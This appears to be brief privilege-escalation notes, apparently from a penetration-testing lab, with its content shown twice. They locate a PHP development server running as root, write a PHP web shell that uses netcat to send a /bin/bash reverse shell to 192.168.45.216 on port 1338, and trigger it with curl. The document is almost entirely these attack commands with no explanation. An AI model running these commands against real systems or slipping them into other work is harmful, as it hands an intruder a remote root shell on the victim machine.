Priv Esc
ps aux | grep root

/bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

echo "<?php system('nc 192.168.45.216 1338 -c /bin/bash');?>" > index.php
curl http://127.0.0.1:57/index.php

Last updated
ps aux | grep root
/bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
echo "<?php system('nc 192.168.45.216 1338 -c /bin/bash');?>" > index.php
curl http://127.0.0.1:57/index.php
Last updated